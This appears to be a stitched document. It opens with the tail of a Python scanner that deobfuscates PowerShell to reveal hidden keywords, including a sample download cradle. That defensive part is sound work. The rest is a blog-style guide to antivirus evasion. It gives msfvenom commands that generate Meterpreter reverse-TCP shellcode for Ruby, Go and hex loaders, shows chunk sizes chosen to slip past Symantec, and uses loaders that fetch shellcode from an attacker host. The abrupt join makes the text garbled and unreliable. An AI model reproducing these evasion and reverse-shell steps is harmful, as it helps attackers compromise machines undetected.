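        consts = {n.lower(): v for n, v in ASSIGN.findall(text)}
        text = VAR_USE.sub(lambda m: consts.get(m.group(1).lower(), m.group(0)), text)
        text = REPLACE.sub(_do_replace, text)   # method calls bind tighter than +
        text = CHAIN.sub(_do_concat, text)
        if text == before:
            break
    return text


def scan(script):
    """Keywords visible in the raw text, and those visible only after folding."""
    raw, folded = script.lower(), fold(script).lower()
    return {"visible": [k for k in KEYWORDS if k in raw],
            "hidden": [k for k in KEYWORDS if k in folded and k not in raw]}


# Constructed samples in the shape of the snippets on this page.
CRADLE = ("$c1='IEX(New-Object Net.WebClient).Downlo';"
          "$c2='123(''http://192.0.2.10/1.ps1'')'.Replace('123','adString');"
          "IEX ($c1+$c2)")
TEMPLATE = ('[DllImport("ke"+"rne"+"l32.dll")]\n'
            '$magic="Syst"+"em"+".dll";\n'
            '$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))')
PLAIN = '[DllImport("kernel32.dll")]\n$msg = \'Backup \' + \'finished\''
```

A keyword reported as hidden is a stronger signal than the keyword itself, because ordinary scripts rarely split API or assembly names across literals.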
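I don't know assembly language well, so I did not add any harmless instructions.
Here I simply use a one-shot generator bash script; if you have time, read through the commands in it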
https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh
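This script generates an hta, and it splits the data into chunks of 1337 characters

In my tests, chunks of 1337 characters were detected by Symantec, so I changed it to chunks of 250 characters

Because I did not add assembly instructions, just press any key to skip at this point; those who know how can add some instructions at the start, such as xor, inc, dec, add, sub, mov, nop

After it finishes, several files are generated

We only use the file final_pshnet_revhttps.ps1; open it and modify it

Change it to

Ruby

When the target machine has ruby installed
Generate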
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby
Paste it into the ruby file

Run
>ruby xx.ruby

Golang

Generate
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
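Convert the code to 0x format, paste it into go.txt and save it as a .go file

Install the Go environment and run the following in the shellcode directory
>go build  (produces the exe)

Loaders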

go-shellcode

https://github.com/brimstone/go-shellcode
Go into the cmd/sc directory and build sc.exe
>go build

Generate
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt 
Load the shellcode with the loader
>sc.exe shellcode

Gsl

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip
>gsl -s SHELLCODE -hex  (shellcode in hex format generated by msf)
>gsl -f shell.raw  (load a raw-format file locally)
>gsl -f shell.hex -hex  (load a hex-format file locally)
>gsl -u http://192.168.0.108/1.raw  (load remotely)
>gsl -u http://192.168.0.108/1.hex
posted @ 2022-12-04 16:03 kalibb